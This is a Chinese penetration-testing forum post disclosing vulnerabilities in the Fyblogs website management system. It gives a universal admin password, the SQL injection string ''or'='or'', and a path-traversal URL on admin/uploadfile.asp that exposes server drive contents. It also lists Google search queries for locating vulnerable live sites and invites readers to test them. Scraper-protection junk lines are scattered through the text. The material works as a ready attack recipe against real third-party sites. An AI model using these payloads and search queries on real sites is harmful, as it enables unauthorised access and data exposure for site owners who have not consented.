中国网络渗透测试联盟
标题:
Fyblogs网站管理系统漏洞
[打印本页]
作者:
admin
时间:
2013-3-7 13:07
标题:
Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过
. ?1 `! i ?- z5 ~! v
, C+ c" `/ P9 @4 V# C
简要描述:
2 ]1 f8 [3 L- m- z
# }0 B4 J6 N/ j& J b. }/ C3 _
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
# K F+ Q9 s0 I
9 G/ l6 @3 w, E1 Q0 f. ~
详细说明:
, X/ i; Z- ]/ s. w4 y& L/ b
0 i% Y& D6 u5 m) {7 X
后台万能密码 'or'='or'
: G9 J1 @: x4 P' b
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
6 B: [; o; p5 t' a
admin/uploadfile.asp?currentFolder=/upfiles/../
. M$ H: X' K7 x4 |1 f. U$ ]
* V' o# D1 v2 r" n5 r( T+ M7 i
漏洞证明:
! M8 Y3 _' X7 r, K
0 b4 e7 R: m, f; S% r
谷歌:inurl:type.asp?id=1 新闻中心
. I; g9 |( w, ]
或者 :inurl:download_ok.asp?
" P% F! j$ t. ?/ |' c
, G, X3 c( K! X$ f: T3 y
可以测试
; f2 m3 |# v. f6 [# ^% l8 f
7 w$ D( R4 ]2 J1 k7 u8 z6 o0 z
! o9 F, G7 v+ |$ n- e4 g
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2